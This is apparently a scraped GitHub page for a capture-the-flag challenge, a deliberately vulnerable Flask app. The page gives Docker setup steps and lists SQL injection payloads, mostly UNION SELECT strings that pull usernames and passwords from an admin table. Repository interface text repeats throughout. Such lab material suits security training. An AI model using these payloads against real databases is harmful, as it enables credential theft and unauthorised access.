UNION-based SQL Injection — CTF Challenge

Summary

Simple Flask app with a user search feature vulnerable to UNION-based SQLi. Goal: extract the admin password (flag) using a UNION SELECT.

Quick start (Docker Compose)

Build and start:

docker-compose build
docker-compose up -d

Visit: http://localhost:5000
Use the username field to inject UNION payload and retrieve the flag.

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
db		db
static		static
templates		templates
Dockerfile		Dockerfile
README.md		README.md
app.py		app.py
challenge-description-report		challenge-description-report
docker-compose.yml		docker-compose.yml
requirements.txt		requirements.txt
security-report.md		security-report.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

UNION-based SQL Injection — CTF Challenge

Summary

Quick start (Docker Compose)

' OR '1'='1

nonexistent' UNION SELECT 1, 2, 3 --

nonexistent' UNION SELECT username, password, 'x' FROM admin --

nonexistent' UNION SELECT NULL, password, NULL FROM admin --

nonexistent' UNION SELECT 1, password, 'x' FROM admin

nonexistent' UNION SELECT 1, password, 'x' FROM admin --

About

Uh oh!

Releases

Packages

Languages

ankit3044/CTF-union-sql

Folders and files

Latest commit

History

Repository files navigation

UNION-based SQL Injection — CTF Challenge

Summary

Quick start (Docker Compose)

' OR '1'='1

nonexistent' UNION SELECT 1, 2, 3 --

nonexistent' UNION SELECT username, password, 'x' FROM admin --

nonexistent' UNION SELECT NULL, password, NULL FROM admin --

nonexistent' UNION SELECT 1, password, 'x' FROM admin

nonexistent' UNION SELECT 1, password, 'x' FROM admin --

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages